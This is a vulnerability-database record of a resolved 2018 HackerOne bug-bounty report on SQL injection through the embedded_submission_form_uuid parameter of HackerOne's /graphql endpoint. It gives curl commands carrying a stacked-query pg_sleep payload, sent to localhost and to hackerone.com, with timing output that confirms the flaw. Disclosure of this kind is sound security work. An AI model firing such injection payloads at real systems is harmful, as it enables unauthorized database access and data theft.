HackerOne: SQL injection in GraphQL endpoint through embedded_submission_form

{"id": "H1:435066", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "HackerOne: SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter", "description": "The `embedded_submission_form_uuid` parameter in the `/graphql` endpoint is vulnerable to a SQL injection. Execute the following command to reproduce the behavior:\n\n**Locally**:\n```\ncurl -X POST http://localhost:8080/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\$30\$%3B--%27\n```\n\n**HackerOne.com**\n```\ncurl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\$30\$%3B--%27\n```\n\n**Additional proof**\n```\n$ time curl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\$5\$%3B--%27\n{}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total\n$ time curl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\$1\$%3B--%27\n{}curl -X POST 0.03s user 0.01s system 2% cpu 1.631 total\n$ time curl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\$10\$%3B--%27\n{}curl -X POST 0.02s user 0.01s system 0% cpu 10.557 total\n```\n\n## Impact\n\nThe SQL injections seems to be executing in the context of the `secure` schema, so impact is currently unknown. However, since an attacker may be able to switch schemas, we should consider this to have a high impact on confidentiality.", "published": "2018-11-06T16:52:08", "modified": "2018-11-30T01:26:39", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/435066", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2018-11-30T05:06:05", "viewCount": 672, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-11-30T05:06:05", "rev": 2}, "dependencies": {"references": [], "modified": "2018-11-30T05:06:05", "rev": 2}, "vulnersScore": 0.3}, "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "security", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/000/013/28af2ada2cc00aa9427504fc5a14f587362df84b_medium.png?1445331713", "small": "https://profile-photos.hackerone-user-content.com/000/000/013/68fea1fe00dc833f4109e015738af4b374727e56_small.png?1445331713"}, "url": "https://hackerone.com/security"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "hackerone_triager": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}}